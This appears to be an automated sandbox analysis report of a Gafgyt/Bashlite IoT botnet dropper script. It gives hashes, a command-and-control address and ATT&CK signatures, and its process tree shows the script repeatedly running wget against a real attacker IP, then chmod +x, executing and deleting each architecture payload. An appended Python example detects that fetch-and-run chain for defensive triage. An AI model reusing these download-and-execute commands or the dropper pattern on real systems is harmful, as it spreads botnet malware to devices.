Analysis

  • max time kernel
    44s
  • max time network
    53s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    28-09-2024 07:55

General

  • Target

    sex.sh

  • Size

    1KB

  • MD5

    884dc57dd0892038d53a2d4b017504df

  • SHA1

    52ab9780591ee9718ce6188a9edafc1afa05dcdf

  • SHA256

    d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779

  • SHA512

    25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca

Malware Config

Extracted

  • Family
    gafgyt
  • C2
    205.185.127.244:23

Signatures

  • Detected Gafgyt variant 11 IoCs
  • Gafgyt/Bashlite

    Gafgyt (also known as Bashlite) is an IoT botnet family with numerous variants, first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses (MITRE ATT&CK T1222). Here the script runs chmod +x on every payload it fetches so that the dropped ELF can be executed.

  • Executes dropped EXE 11 IoCs
  • Modifies Watchdog functionality 1 TTPs 6 IoCs

    Malware such as Mirai disables the hardware watchdog (in Mirai's case through an ioctl on /dev/watchdog) so that the device is not rebooted automatically; a reboot would clear the non-persistent bot from memory.

  • Changes its process name 3 IoCs
  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system (MITRE ATT&CK T1016).

  • Writes file to tmp directory 11 IoCs

    Malware often drops required files in the /tmp directory, which is world-writable and usually not preserved across reboots. Here every payload is fetched into /tmp, the working directory of sex.sh, and deleted again after the execution attempt.

Processes

  • /tmp/sex.sh
    /tmp/sex.sh
    1⤵
      PID:1493
      • /usr/bin/wget
        wget http://205.185.127.244/mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1494
      • /bin/chmod
        chmod +x mips
        2⤵
        • File and Directory Permissions Modification
        PID:1506
      • /tmp/mips
        ./mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:1507
      • /bin/rm
        rm -rf mips
        2⤵
        • System Network Configuration Discovery
        PID:1509
      • /usr/bin/wget
        wget http://205.185.127.244/mipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1510
      • /bin/chmod
        chmod +x mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:1511
      • /tmp/mipsel
        ./mipsel
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:1512
      • /bin/rm
        rm -rf mipsel
        2⤵
        • System Network Configuration Discovery
        PID:1514
      • /usr/bin/wget
        wget http://205.185.127.244/sh4
        2⤵
        • Writes file to tmp directory
        PID:1515
      • /bin/chmod
        chmod +x sh4
        2⤵
        • File and Directory Permissions Modification
        PID:1516
      • /tmp/sh4
        ./sh4
        2⤵
        • Executes dropped EXE
        PID:1517
      • /bin/rm
        rm -rf sh4
        2⤵
        PID:1519
      • /usr/bin/wget
        wget http://205.185.127.244/x86
        2⤵
        • Writes file to tmp directory
        PID:1520
      • /bin/chmod
        chmod +x x86
        2⤵
        • File and Directory Permissions Modification
        PID:1521
      • /tmp/x86
        ./x86
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Changes its process name
        PID:1522
      • /bin/rm
        rm -rf x86
        2⤵
        PID:1525
      • /usr/bin/wget
        wget http://205.185.127.244/arm61
        2⤵
        • Writes file to tmp directory
        PID:1527
      • /bin/chmod
        chmod +x arm61
        2⤵
        • File and Directory Permissions Modification
        PID:1531
      • /tmp/arm61
        ./arm61
        2⤵
        • Executes dropped EXE
        PID:1532
      • /bin/rm
        rm -rf arm61
        2⤵
        PID:1534
      • /usr/bin/wget
        wget http://205.185.127.244/i686
        2⤵
        • Writes file to tmp directory
        PID:1535
      • /bin/chmod
        chmod +x i686
        2⤵
        • File and Directory Permissions Modification
        PID:1536
      • /tmp/i686
        ./i686
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Changes its process name
        PID:1537
      • /bin/rm
        rm -rf i686
        2⤵
        PID:1540
      • /usr/bin/wget
        wget http://205.185.127.244/ppc
        2⤵
        • Writes file to tmp directory
        PID:1542
      • /bin/chmod
        chmod +x ppc
        2⤵
        • File and Directory Permissions Modification
        PID:1544
      • /tmp/ppc
        ./ppc
        2⤵
        • Executes dropped EXE
        PID:1545
      • /bin/rm
        rm -rf ppc
        2⤵
        PID:1547
      • /usr/bin/wget
        wget http://205.185.127.244/586
        2⤵
        • Writes file to tmp directory
        PID:1548
      • /bin/chmod
        chmod +x 586
        2⤵
        • File and Directory Permissions Modification
        PID:1549
      • /tmp/586
        ./586
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Changes its process name
        PID:1550
      • /bin/rm
        rm -rf 586
        2⤵
        PID:1553
      • /usr/bin/wget
        wget http://205.185.127.244/m68k
        2⤵
        • Writes file to tmp directory
        PID:1555
      • /bin/chmod
        chmod +x m68k
        2⤵
        • File and Directory Permissions Modification
        PID:1557
      • /tmp/m68k
        ./m68k
        2⤵
        • Executes dropped EXE
        PID:1558
      • /bin/rm
        rm -rf m68k
        2⤵
        PID:1560
      • /usr/bin/wget
        wget http://205.185.127.244/dc
        2⤵
        PID:1561
      • /bin/chmod
        chmod +x dc
        2⤵
        • File and Directory Permissions Modification
        PID:1562
      • /tmp/dc
        ./dc
        2⤵
        PID:1563
      • /bin/rm
        rm -rf dc
        2⤵
        PID:1564
      • /usr/bin/wget
        wget http://205.185.127.244/dss
        2⤵
        • Writes file to tmp directory
        PID:1565
      • /bin/chmod
        chmod +x dss
        2⤵
        • File and Directory Permissions Modification
        PID:1566
      • /tmp/dss
        ./dss
        2⤵
        • Executes dropped EXE
        PID:1567
      • /bin/rm
        rm -rf dss
        2⤵
        PID:1569
      • /usr/bin/wget
        wget http://205.185.127.244/co
        2⤵
        • Writes file to tmp directory
        PID:1570
      • /bin/chmod
        chmod +x co
        2⤵
        • File and Directory Permissions Modification
        PID:1571
      • /tmp/co
        ./co
        2⤵
        • Executes dropped EXE
        PID:1572
      • /bin/rm
        rm -rf co
        2⤵
        PID:1574
      • /usr/bin/wget
        wget http://205.185.127.244/scar
        2⤵
        PID:1575
      • /bin/chmod
        chmod +x scar
        2⤵
        • File and Directory Permissions Modification
        PID:1576
      • /tmp/scar
        ./scar
        2⤵
        PID:1577
      • /bin/rm
        rm -rf scar
        2⤵
        PID:1578

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/586

    Filesize

    107KB

    MD5

    878511883ecf938a9b30e0a5eebb1b78

    SHA1

    6f4192c09680a8cdec1c33fec77e40a96faeee15

    SHA256

    777ff84d65d53fb8da3f25c4c303cb6f6505ee534e8bdbd936c1f9e60e70a533

    SHA512

    8ea3f989940b431a6b994374fc322a0eb7933fe6791e947a573ad3e7d26f6a4ee8c72ae4d79e6d23be5f152df4e29934bb7e623a7530ac2752f4c6e3cf0181a4

  • /tmp/arm61

    Filesize

    174KB

    MD5

    00c59b56e0ef93ffa2eacb7ffc355bc6

    SHA1

    e9f1a9fa3f2d7e9b8d40129dea37e82746609cea

    SHA256

    e0fa297f5c991e85f42412776055dda158fb18d7d69ff51e2b5430291f1746c7

    SHA512

    063a3293125b6981bafe1409bbf2b06ce21496a18496a39a4837f1bdad73e8dfb590118a1eab50e50504ef884a389e516090f485f7381c68f3233d290cdbadcf

  • /tmp/co

    Filesize

    174KB

    MD5

    8d324a6048da1a123cef9a1465400ece

    SHA1

    dca6c1f2874c31de3b3b684ef99be2d82450d3bf

    SHA256

    4cdd14a882e285d404b0da6a70470dfd5553a04352e30a6f7418c689f8f8916a

    SHA512

    6ba9293bd1d81164d38cd46759aee0ff912b9354c71eb4a639695ed0c0829f4f2a846845647a4c72b295cac8fe2780f107336ea12ba10623df8f1fa4f3ca1f0e

  • /tmp/dss

    Filesize

    135KB

    MD5

    70445303ca15c2739d0c1d103fc77783

    SHA1

    97bd19478d17211679b66692a7945ed38c9924e3

    SHA256

    51bbbe5154ebaf34aceb846a0823dbd88cae1175cd90d6e741b89ad3fe16a5e0

    SHA512

    a3daa674f970158f76cbb83a10704e880d313d3e2615d486395f0c8339017c2fc1d98084ebe82bd3a6b5e898032e976c4440905c764eb0c048b3983f4b956b77

  • /tmp/i686

    Filesize

    111KB

    MD5

    9528d0e8ca08dae17e7e19ef7d13e035

    SHA1

    5d1ff7764e03718af5ebe432c9b8d0d2e1d057ee

    SHA256

    53c2bfcfa15435d366b80b96946fe5cff049453b086cd255faf0968d55605f1e

    SHA512

    72d6cd79bf99d095ee7009c3ff6569d7fbc0b950207aac061c4a289f9e89027519e1d7fa25f778a3131c0f57743ccdec5c30d4ebb8eabaa48ed61ceb18c4030e

  • /tmp/m68k

    Filesize

    129KB

    MD5

    5f4fef5c575e8b3b11d8475dd4de719a

    SHA1

    273104250032ebdc02e19b05bcf2b5b682e27368

    SHA256

    b909016b579dfc65db56aac511f68f0ed62ef87b14c4819278ad9dc67cf68338

    SHA512

    7103b1af22a821297fc1aab82e128936e306059ed055d979e5af418cc8e21ead7f2d28988816b8709be733a36eaccaca0a5d3f0fd17983400cb5e3daeb907e89

  • /tmp/mips

    Filesize

    176KB

    MD5

    24e07a16008a42f0a8dceb166b4b44cd

    SHA1

    87f80fc2998304bc8735479faa75f509a6d5db13

    SHA256

    c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f

    SHA512

    b75a61fc9584e124dbc98556e30166e379dc01ce64312a48906d8e4aed406127aeea1da5f8183e10fe0468908863f7467ac58e71f482c119300836c7c419dab5

  • /tmp/mipsel

    Filesize

    176KB

    MD5

    ac28a3dfa3ed9b815a8021a362b06607

    SHA1

    93455b3775f586e230d8879489f9a6062de70677

    SHA256

    3d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5

    SHA512

    94c3aae6a3e945aac0beff504c76f454a5f2b78b88d4cd2364cb0f5608dc25183d37bf0338d4fc2966616e95cbe7ef03f34dfb910dd688ae536d9f5a66f1516e

  • /tmp/ppc

    Filesize

    128KB

    MD5

    184c7d44649ab256bd5705724bbec6a1

    SHA1

    baa0a75bd81f5985eb42ad0bdc282405b66af67d

    SHA256

    3a6f6b23c30602cfd2328e7a6972fcc29423e4ed67a1b854d108b7711992ec58

    SHA512

    ec1cd34debb06ce5c1571582f26b433ee34c7959fa1d1af0e1e6a0f9834f3d277916e8128d1b73ad569df89e7576b3b9a1a112dd08f10ddee00e30e821ffaa43

  • /tmp/sh4

    Filesize

    123KB

    MD5

    5ec3c0e18b6fbc6e37bd611e2df8f9a4

    SHA1

    de10e2b7ce11ffa0bc0fcca82a489a3e6efc160d

    SHA256

    9b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6

    SHA512

    76f484543e43cfb33ff449439a64ae08578a7c8142393eed0219f642d7e9401ecf7efe093765be45f1c767d970cc0d280ba53264eb2a6eb7771a7055765e8b20

  • /tmp/x86

    Filesize

    127KB

    MD5

    678363120cd2661f040670b90f211243

    SHA1

    57d75e1c42243d08eb78623e6cdc6b066994a7ee

    SHA256

    cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a

    SHA512

    5a2b440135caa5656deb70f7d6274f8bc570e31c6aac4b6aac8375962db512b885afc6223a9767fc0ff7f29dc5377efa441277cb356dba1e3b5716a57f38ca55
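The Processes tree and the Signatures list above together describe one repeated pattern: for each architecture name the script fetches http://205.185.127.244/&lt;name&gt; into /tmp, marks it executable, runs it and deletes it, with the payload host being the same address as the extracted C2 (205.185.127.244:23). Two of the thirteen requested payloads (dc and scar) never appear in the Downloads section and carry no "Executes dropped EXE" tag, which is what a failed fetch looks like in this kind of report; the three that were tagged with watchdog and process-name changes (x86, i686, 586) are the ones an amd64 sandbox can run natively, so the other ELF files were only exec-attempted. The Python below is an added example, not part of the sandbox output: it flattens the report's tree into exec events, detects the fetch / chmod +x / execute / delete chain per payload, and cross-checks requested payloads against the retained hashes. The PIDs, URLs and SHA256 values are copied from the report; the event shape (pid, ppid, exe, argv), the function names and the benign NOISE events are this example's own assumptions.

```python
"""Added example for this report (not part of the sandbox output): flatten the
process tree above into exec events, detect the fetch / chmod +x / execute /
delete dropper pattern per payload, and cross-check which requested payloads
actually landed in /tmp according to the Downloads section.
PIDs, URLs and hashes are copied from the report; the event shape
(pid, ppid, exe, argv), the function names and the benign NOISE events are
this example's own assumptions."""
import re
from urllib.parse import urlparse

ROOT_PID = 1493                     # /tmp/sex.sh, from the report
HOST = "http://205.185.127.244"     # payload server, from the report

# (name, wget pid, chmod pid, exec pid, rm pid) per payload, from the report.
CHAIN_PIDS = [
    ("mips",   1494, 1506, 1507, 1509), ("mipsel", 1510, 1511, 1512, 1514),
    ("sh4",    1515, 1516, 1517, 1519), ("x86",    1520, 1521, 1522, 1525),
    ("arm61",  1527, 1531, 1532, 1534), ("i686",   1535, 1536, 1537, 1540),
    ("ppc",    1542, 1544, 1545, 1547), ("586",    1548, 1549, 1550, 1553),
    ("m68k",   1555, 1557, 1558, 1560), ("dc",     1561, 1562, 1563, 1564),
    ("dss",    1565, 1566, 1567, 1569), ("co",     1570, 1571, 1572, 1574),
    ("scar",   1575, 1576, 1577, 1578),
]

# SHA256 of each file actually retained in /tmp (Downloads section).
RETAINED_SHA256 = {
    "586":    "777ff84d65d53fb8da3f25c4c303cb6f6505ee534e8bdbd936c1f9e60e70a533",
    "arm61":  "e0fa297f5c991e85f42412776055dda158fb18d7d69ff51e2b5430291f1746c7",
    "co":     "4cdd14a882e285d404b0da6a70470dfd5553a04352e30a6f7418c689f8f8916a",
    "dss":    "51bbbe5154ebaf34aceb846a0823dbd88cae1175cd90d6e741b89ad3fe16a5e0",
    "i686":   "53c2bfcfa15435d366b80b96946fe5cff049453b086cd255faf0968d55605f1e",
    "m68k":   "b909016b579dfc65db56aac511f68f0ed62ef87b14c4819278ad9dc67cf68338",
    "mips":   "c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f",
    "mipsel": "3d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5",
    "ppc":    "3a6f6b23c30602cfd2328e7a6972fcc29423e4ed67a1b854d108b7711992ec58",
    "sh4":    "9b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6",
    "x86":    "cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a",
}


def report_events():
    """Flatten the report's tree into (pid, ppid, exe, argv) exec events."""
    ev = [(ROOT_PID, 1, "/bin/sh", "/tmp/sex.sh")]
    for name, w, c, x, r in CHAIN_PIDS:
        ev += [(w, ROOT_PID, "/usr/bin/wget", f"wget {HOST}/{name}"),
               (c, ROOT_PID, "/bin/chmod", f"chmod +x {name}"),
               (x, ROOT_PID, f"/tmp/{name}", f"./{name}"),
               (r, ROOT_PID, "/bin/rm", f"rm -rf {name}")]
    return ev


# Constructed benign activity (assumption): a fetch that is never chmod'ed or run.
NOISE = [(1600, 1, "/usr/bin/wget", "wget http://example.invalid/notes.txt"),
         (1601, 1, "/bin/rm", "rm -rf notes.txt")]


def dropper_chains(events):
    """Return {payload_name: {stage: pid, 'url': ...}} for every group of sibling
    processes that fetches a file, chmod +x's it, executes it and deletes it.
    Groups are keyed by (parent pid, file name) so unrelated fetches don't merge."""
    pats = [("fetch", re.compile(r"^(?:wget|curl)\s+(\S+://\S+)$")),
            ("chmod", re.compile(r"^chmod\s+\+x\s+(\S+)$")),
            ("exec",  re.compile(r"^\./(\S+)$")),
            ("rm",    re.compile(r"^rm\s+-rf\s+(\S+)$"))]
    required = {"fetch", "chmod", "exec", "rm"}
    chains = {}
    for pid, ppid, exe, argv in sorted(events):      # PID order == exec order here
        for stage, pat in pats:
            m = pat.match(argv)
            if not m:
                continue
            name = m.group(1).rsplit("/", 1)[-1]    # URL basename or bare file name
            entry = chains.setdefault((ppid, name), {"url": None})
            if stage == "fetch":
                entry["url"] = m.group(1)
            entry[stage] = pid
    return {name: c for (ppid, name), c in chains.items() if required <= set(c)}


def iocs(chains):
    """Network IOCs implied by the chains: payload URLs and the hosts behind them."""
    urls = sorted(c["url"] for c in chains.values())
    hosts = sorted({urlparse(u).hostname for u in urls})
    return urls, hosts


def fetch_outcome(chains, retained=RETAINED_SHA256):
    """Split requested payloads into those that landed on disk (hash known) and
    those the script asked for but which never showed up in /tmp."""
    landed = {n: retained[n] for n in chains if n in retained}
    missing = sorted(n for n in chains if n not in retained)
    return landed, missing


if __name__ == "__main__":
    chains = dropper_chains(report_events() + NOISE)
    urls, hosts = iocs(chains)
    landed, missing = fetch_outcome(chains)
    print(f"{len(chains)} dropper chains, payload host(s): {hosts}")
    print("requested but not retained:", missing)
    for name, sha in landed.items():
        print(f"{name:7} exec pid {chains[name]['exec']}  sha256 {sha}")
```

The grouping key (parent pid, file name) is what makes this usable on real process telemetry rather than only on this report: a shell that fetches a file it never makes executable, like the constructed NOISE events, produces an incomplete group and is not reported, while each architecture loop of the script produces a full four-stage chain under the same parent. Payloads that were requested but are absent from the retained-hash table are exactly the ones the sandbox could not download, which is a quick way to tell a dead payload URL from a live one when triaging a batch of these scripts.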